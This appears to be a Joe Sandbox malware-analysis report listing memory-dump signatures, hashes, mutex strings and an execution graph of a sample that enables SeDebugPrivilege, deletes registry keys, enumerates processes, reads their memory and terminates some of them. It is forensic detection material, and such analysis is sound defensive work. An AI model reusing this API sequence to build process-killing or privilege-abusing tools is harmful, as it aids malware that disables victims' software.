                                                                                                                      • Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
                                                                                                                      • Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2210144848-0
                                                                                                                      • Opcode ID: 805c3f4572016d1162eba903c1866f821554d6bcbc59870d2561a84f84d0e957
                                                                                                                      • Instruction ID: d203cd5db921ee905cf7dc2ef50a84b419aa93113f07238f0b0c4a9b4c5914d4
                                                                                                                      • Opcode Fuzzy Hash: 805c3f4572016d1162eba903c1866f821554d6bcbc59870d2561a84f84d0e957
                                                                                                                      • Instruction Fuzzy Hash: 4581A032712E12C9FB569F648A407EDABA2F74FBD8F444217FA0A5B691EB348441C712
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
                                                                                                                      • Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2882836952-0
                                                                                                                      • Opcode ID: 98b2d38467aad0f12371f4981a99e71c5d2d9a384676790713b3d681f93ff9b7
                                                                                                                      • Instruction ID: 6e9532786cbdca0e156fbd0fb65b8a04cc612657cd6844af7565194307e7464a
                                                                                                                      • Opcode Fuzzy Hash: 98b2d38467aad0f12371f4981a99e71c5d2d9a384676790713b3d681f93ff9b7
                                                                                                                      • Instruction Fuzzy Hash: 0561DA3661AB44C6EB619F15F55075AB7A0F39A788F110127FA8E8BBA4EB78C440CF05
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917423134.000001A00AAD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001A00AAD0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00aad0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _set_statfp
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1156100317-0
                                                                                                                      • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                                                      • Instruction ID: 5a1b5ca53786cbf6d39373e6ca6d626c02978b1a4149a11872ea8bd03b61494c
                                                                                                                      • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                                                      • Instruction Fuzzy Hash: D9117372B56F2241F6A6916AD7953E91040AB7F3F4F184B28BA6607EDB8B3488C14203
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
                                                                                                                      • Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _set_statfp
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1156100317-0
                                                                                                                      • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                                                      • Instruction ID: d88096662d0153a66654303d9494f0c836c1f1b875289841d42d898a64fec9e7
                                                                                                                      • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                                                      • Instruction Fuzzy Hash: E211E733B47E2301F66A1965D7553E58A407B6F3F0F140626FA662E7D7EB684C81C202
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
                                                                                                                      • Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1092925422-0
                                                                                                                      • Opcode ID: 95c025b2b6ac4fd8cd0aff1f1749a1d88ffa67048487cde947e6dbc57d84852c
                                                                                                                      • Instruction ID: 54e5756abe6fa3c76e3175197b53ca79500eb2761b0be7e8c833124ac9a39f69
                                                                                                                      • Opcode Fuzzy Hash: 95c025b2b6ac4fd8cd0aff1f1749a1d88ffa67048487cde947e6dbc57d84852c
                                                                                                                      • Instruction Fuzzy Hash: E4113736706B41C3EB658F22E64478AB7B0F74BB90F054026EA880B794FF39C948D745
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917423134.000001A00AAD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001A00AAD0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00aad0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                      • String ID: csm$f
                                                                                                                      • API String ID: 3242871069-629598281
                                                                                                                      • Opcode ID: 2b5e796eb5467920efef0e0a99ae24113856edacf9d40b67cb560e30e154ce16
                                                                                                                      • Instruction ID: f2f5e955dbec54537bdb701bd4e824a6fba55f67bea7c000e4027a097a2c200c
                                                                                                                      • Opcode Fuzzy Hash: 2b5e796eb5467920efef0e0a99ae24113856edacf9d40b67cb560e30e154ce16
                                                                                                                      • Instruction Fuzzy Hash: D651B2367136008AEB56DF15D604B9977A9F34FBD8F518220EA9747BC8EB38C9C18702
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917423134.000001A00AAD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001A00AAD0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00aad0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                      • String ID: csm$f
                                                                                                                      • API String ID: 3242871069-629598281
                                                                                                                      • Opcode ID: f92dbc6d1c1d953d5be36fe8438910096b534b45e3e951fcd2048bd10c89d910
                                                                                                                      • Instruction ID: d97fa706ac810d65f73ff12e11b1e4144ec2b971a006a521d2e836ccadbc7390
                                                                                                                      • Opcode Fuzzy Hash: f92dbc6d1c1d953d5be36fe8438910096b534b45e3e951fcd2048bd10c89d910
                                                                                                                      • Instruction Fuzzy Hash: 57315A3131264096EB16DF15E944B9977A8F74FBD8F058214BE9707BC4DB3CC9818706
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
                                                                                                                      • Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileType
                                                                                                                      • String ID: \\.\pipe\
                                                                                                                      • API String ID: 3081899298-91387939
                                                                                                                      • Opcode ID: ca8ddeb7ac59d6e709c177a04970a920754aa102293d40bded593f37500a9fba
                                                                                                                      • Instruction ID: 06e2bf78dd25355b9647ceb32fbfced99056287e211598471632cd10ce9d7a91
                                                                                                                      • Opcode Fuzzy Hash: ca8ddeb7ac59d6e709c177a04970a920754aa102293d40bded593f37500a9fba
                                                                                                                      • Instruction Fuzzy Hash: A271B132702E85C2EA269E259A45BEAAB94F74F7D4F420017FD494BB88EF35C604C742
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
                                                                                                                      • Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileType
                                                                                                                      • String ID: \\.\pipe\
                                                                                                                      • API String ID: 3081899298-91387939
                                                                                                                      • Opcode ID: 7663802d97220815dd834e17801c2a4e2bb3ef89d9d316510f4c5ee1515461d8
                                                                                                                      • Instruction ID: 5a1792d0172c0542b728fed8180503d46c045727c5c6ccc8760714f537646b77
                                                                                                                      • Opcode Fuzzy Hash: 7663802d97220815dd834e17801c2a4e2bb3ef89d9d316510f4c5ee1515461d8
                                                                                                                      • Instruction Fuzzy Hash: D251B933306BC1C2E6669E299254BEEEB51F78F7C0F160027ED850BB59EB39C5018B46
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
                                                                                                                      • Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorFileLastWrite
                                                                                                                      • String ID: U
                                                                                                                      • API String ID: 442123175-4171548499
                                                                                                                      • Opcode ID: 33761665e30f7191252d6346bfc4364073660ee169ab4516afdd483d80f04c27
                                                                                                                      • Instruction ID: c1a0a57d68e428412cd33225ca17d8cd7264e6bc02a32dc6e137868d2688e70a
                                                                                                                      • Opcode Fuzzy Hash: 33761665e30f7191252d6346bfc4364073660ee169ab4516afdd483d80f04c27
                                                                                                                      • Instruction Fuzzy Hash: 1341B232316A4592EB618F25E9443EABBA0F78A7D4F504122EE4D8B788EB38C441CB41
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      • Global\tmlNftmlNfSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYwSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYw, xrefs: 000001A00BDB2A4D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
                                                                                                                      • Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseHandleMutexOpen
                                                                                                                      • String ID: Global\tmlNftmlNfSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYwSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYw
                                                                                                                      • API String ID: 3128266590-3670590667
                                                                                                                      • Opcode ID: 7f13c5918517e76ecd90b03edc6bf557ba308c82d84999e88c8a65afd720b3bc
                                                                                                                      • Instruction ID: 5c65c8e07f2e6bba86b1e0a57da172ad8599d3035f99905eedb36c8842fea66c
                                                                                                                      • Opcode Fuzzy Hash: 7f13c5918517e76ecd90b03edc6bf557ba308c82d84999e88c8a65afd720b3bc
                                                                                                                      • Instruction Fuzzy Hash: 2F217C36305B4182E662CF16AA40B9AEA90F79BBD0F064016AE894B754FF38C495C705
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      • Global\tmlNftmlNfSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYwSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYw, xrefs: 000001A00BDB2B39
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
                                                                                                                      • Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseHandleMutexOpen
                                                                                                                      • String ID: Global\tmlNftmlNfSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYwSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYw
                                                                                                                      • API String ID: 3128266590-3670590667
                                                                                                                      • Opcode ID: 5302a5e3305b9a05be76c3053b07484aa6e553cd40859f2f5bec3a73be18632a
                                                                                                                      • Instruction ID: e200cf13dc4769abfcf4598354e47784319e22ba1082438064a1e6d370fc1f80
                                                                                                                      • Opcode Fuzzy Hash: 5302a5e3305b9a05be76c3053b07484aa6e553cd40859f2f5bec3a73be18632a
                                                                                                                      • Instruction Fuzzy Hash: 8A21AE32701B4182E7629F16BA44B9AFB90F78FB80F06402AEE494B758FF34C446C749
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
                                                                                                                      • Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Stringtry_get_function
                                                                                                                      • String ID: LCMapStringEx
                                                                                                                      • API String ID: 2588686239-3893581201
                                                                                                                      • Opcode ID: 1fa9275d433daf0b6716fc06567d784d1258d0ff6276e676772a611a04aaaae8
                                                                                                                      • Instruction ID: e994eeb8473ee2ce42edb99524e049a0a6f7113b340f99ecc08091389803b8a7
                                                                                                                      • Opcode Fuzzy Hash: 1fa9275d433daf0b6716fc06567d784d1258d0ff6276e676772a611a04aaaae8
                                                                                                                      • Instruction Fuzzy Hash: F511E536708B8086D6619F56B54079ABBA5F78EBD0F544126EE8D87B19EF38C450CB40
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
                                                                                                                      • Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ExceptionFileHeaderRaise
                                                                                                                      • String ID: csm
                                                                                                                      • API String ID: 2573137834-1018135373
                                                                                                                      • Opcode ID: 4e7fa5f10fb8cdd189fffd301e3fa9d361a0630010e37bb7f0a8f0acf9fdffb8
                                                                                                                      • Instruction ID: 3d675ad305f4b60011f01be8626d93db4cc1bf856ae9dff07d3c43f449315f3a
                                                                                                                      • Opcode Fuzzy Hash: 4e7fa5f10fb8cdd189fffd301e3fa9d361a0630010e37bb7f0a8f0acf9fdffb8
                                                                                                                      • Instruction Fuzzy Hash: 64112B32215F8082EB118F25E554799BBE5F78AB94F594221EF890B764EF3DC551C700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
                                                                                                                      • Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                                                                                      • String ID: InitializeCriticalSectionEx
                                                                                                                      • API String ID: 539475747-3084827643
                                                                                                                      • Opcode ID: d3308de59f6175e246a4e58d0bead6ac7e88a58d51302341d1d8d46ecdfbdf17
                                                                                                                      • Instruction ID: 7f9f02a454f7ca7b4f3d673a65f39ea951a329999e2fcda576414f18e675d86d
                                                                                                                      • Opcode Fuzzy Hash: d3308de59f6175e246a4e58d0bead6ac7e88a58d51302341d1d8d46ecdfbdf17
                                                                                                                      • Instruction Fuzzy Hash: 1DF09A35306F4191EA069F41A600BC9AA71AB8FBD0F498023F91A0BB14EF38C495CB02
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
                                                                                                                      • Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Valuetry_get_function
                                                                                                                      • String ID: FlsSetValue
                                                                                                                      • API String ID: 738293619-3750699315
                                                                                                                      • Opcode ID: c57a0a8e4a9a5bd5c5ab42880a7d7ba481cf5cc2991d860fdde5879172b30074
                                                                                                                      • Instruction ID: a76eeab8eba0c101ae519160217dba5dc58d499fc8658bd8a04a5c490138ca18
                                                                                                                      • Opcode Fuzzy Hash: c57a0a8e4a9a5bd5c5ab42880a7d7ba481cf5cc2991d860fdde5879172b30074
                                                                                                                      • Instruction Fuzzy Hash: 5BE06571306E0192FA075F55FA107D9E632B78F7C0F998027F9190E355EE38C455C602
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
                                                                                                                      • Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$Process$AllocFree
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 756756679-0
                                                                                                                      • Opcode ID: 286b6d01e01d60a9c7311f258349b816b5eba68e569a770be06b8a5557e1329f
                                                                                                                      • Instruction ID: b90c0be3292b4290cd22fe31e849e46e93c3ca14b6929f8396277a63c1af27cb
                                                                                                                      • Opcode Fuzzy Hash: 286b6d01e01d60a9c7311f258349b816b5eba68e569a770be06b8a5557e1329f
                                                                                                                      • Instruction Fuzzy Hash: 49219132716F80C5EA128F19E50079AF7A1FB8ABE4F054012EE8C5BB24FB78C442C700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
                                                                                                                      • Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$AllocProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1617791916-0
                                                                                                                      • Opcode ID: d4b3fcfbe4be7c36cb8b6f9944163e5fe9bb7a40ebadcfb6d552ceb49718e017
                                                                                                                      • Instruction ID: d6c94a215b51b18db14f0563b7663135afab6454f92611acca2e05b6b8ed55d4
                                                                                                                      • Opcode Fuzzy Hash: d4b3fcfbe4be7c36cb8b6f9944163e5fe9bb7a40ebadcfb6d552ceb49718e017
                                                                                                                      • Instruction Fuzzy Hash: C3E06D71702A059BF7058F62D804389BAE1FB8FFA1F49D028C9090B350EF7D8499CB45
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:64.2%
                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                      Signature Coverage:0%
                                                                                                                      Total number of Nodes:56
                                                                                                                      Total number of Limit Nodes:2
                                                                                                                      execution_graph 107 4014fc 110 401509 107->110 127 40133e GetCurrentProcessId OpenProcess 110->127 113 401540 134 4013d1 SysAllocString SysAllocString CoInitializeEx 113->134 114 401532 RegDeleteValueW 114->113 116 401546 143 401292 GetProcessHeap HeapAlloc 116->143 118 40154b GetProcessHeap HeapAlloc 150 401081 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 118->150 120 40159d GetProcessHeap RtlFreeHeap 157 401000 RegOpenKeyExW 120->157 122 401501 ExitProcess 123 401572 123->120 124 40158c 123->124 126 40159b 123->126 163 40122b 124->163 126->120 128 401361 OpenProcessToken 127->128 129 4013cb RegOpenKeyExW 127->129 130 401372 LookupPrivilegeValueW 128->130 131 4013c4 FindCloseChangeNotification 128->131 129->113 129->114 130->131 132 401386 AdjustTokenPrivileges 130->132 131->129 132->131 133 4013b6 GetLastError 132->133 133->131 135 4014e6 134->135 136 401408 CoInitializeSecurity 134->136 139 4014e9 SysFreeString SysFreeString 135->139 137 401429 CoCreateInstance 136->137 138 40141e 136->138 140 40144d VariantInit 137->140 142 401490 CoUninitialize 137->142 138->137 138->142 139->116 140->142 142->139 144 401081 12 API calls 143->144 147 4012be 144->147 145 40130c GetProcessHeap RtlFreeHeap 145->118 146 40130a 146->145 147->145 147->146 148 4012dd OpenProcess 147->148 148->147 149 4012f0 TerminateProcess CloseHandle 148->149 149->147 151 4011fd GetProcessHeap HeapFree GetProcessHeap RtlFreeHeap 150->151 156 4010e9 150->156 151->123 152 4011fb 152->151 153 401100 OpenProcess 154 40111a K32EnumProcessModules 153->154 153->156 155 4011ea FindCloseChangeNotification 154->155 154->156 155->156 156->152 156->153 156->155 158 40106b RegDeleteKeyExW 157->158 159 40102c 157->159 158->122 160 40103e RegEnumKeyExW 159->160 161 401062 RegCloseKey 160->161 162 40102e RegDeleteKeyW 160->162 161->158 162->160 164 401240 OpenProcess 163->164 165 40128b 163->165 164->165 166 401255 164->166 165->123 171 40131f GetModuleHandleA 166->171 168 401271 169 401288 CloseHandle 168->169 170 401282 CloseHandle 168->170 169->165 170->169 172 40133b 171->172 173 40132e GetProcAddress 171->173 172->168 173->168

                                                                                                                      Callgraph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      • Opacity -> Relevance
                                                                                                                      • Disassembly available
                                                                                                                      callgraph 0 Function_00401000 1 Function_004013D1 2 Function_00401081 3 Function_00401292 3->2 4 Function_00401509 4->0 4->1 4->2 4->3 5 Function_0040122B 4->5 7 Function_0040133E 4->7 8 Function_0040131F 5->8 6 Function_004014FC 6->4

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 00401348
                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00401355
                                                                                                                      • OpenProcessToken.ADVAPI32(00000000,00000028,?), ref: 00401368
                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 0040137C
                                                                                                                      • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000), ref: 004013AC
                                                                                                                      • GetLastError.KERNEL32 ref: 004013B6
                                                                                                                      • FindCloseChangeNotification.KERNELBASE(00000000), ref: 004013C5
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000F.00000002.1927406646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_15_2_400000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$OpenToken$AdjustChangeCloseCurrentErrorFindLastLookupNotificationPrivilegePrivilegesValue
                                                                                                                      • String ID: SeDebugPrivilege
                                                                                                                      • API String ID: 575374161-2896544425
                                                                                                                      • Opcode ID: f0a33f7c903080f54f4a1dfe6a3c8c5db33aaa213762ad9be091dafd7757ca93
                                                                                                                      • Instruction ID: e2a5f4244efd0fdb54eb2fb8bae3e68f4838b917bcc28da7506a6e19d6301c26
                                                                                                                      • Opcode Fuzzy Hash: f0a33f7c903080f54f4a1dfe6a3c8c5db33aaa213762ad9be091dafd7757ca93
                                                                                                                      • Instruction Fuzzy Hash: C101CC75901619AFE7009BA49E89BAF77BCEB04745F004435BA01F22D1D7B49E44CB68
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00009C40,?,?,00000000), ref: 004010A4
                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 004010B1
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00009C40,?,?,00000000), ref: 004010BF
                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 004010C6
                                                                                                                      • K32EnumProcesses.KERNEL32(000003E8,00009C40,?,?,?,00000000), ref: 004010DB
                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,000003E8,?,?,00000000), ref: 0040110A
                                                                                                                      • K32EnumProcessModules.KERNEL32(00000000,?,00009C40,?,?,?,00000000), ref: 00401127
                                                                                                                      • ReadProcessMemory.KERNEL32(00000000,?,?,00000200,00000000,?,?,00000000), ref: 0040115D
                                                                                                                      • FindCloseChangeNotification.KERNELBASE(00000000,?,?,00000000), ref: 004011EB
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,000003E8,?,?,00000000), ref: 004011FF
                                                                                                                      • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 0040120C
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?,?,?,00000000), ref: 00401212
                                                                                                                      • RtlFreeHeap.NTDLL(00000000,?,?,00000000), ref: 00401219
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000F.00000002.1927406646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_15_2_400000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$Process$AllocEnumFree$ChangeCloseFindMemoryModulesNotificationOpenProcessesRead
                                                                                                                      • String ID: pDt
                                                                                                                      • API String ID: 2178662837-1368317816
                                                                                                                      • Opcode ID: 6f488189a1a7d797b470e7b51ae5cf9387d1cdd426fc30596596fbc8e91c7bf4
                                                                                                                      • Instruction ID: da445f777c3a34a6d199b0584eba223951ce35d7d1b72319c39e632b78911c99
                                                                                                                      • Opcode Fuzzy Hash: 6f488189a1a7d797b470e7b51ae5cf9387d1cdd426fc30596596fbc8e91c7bf4
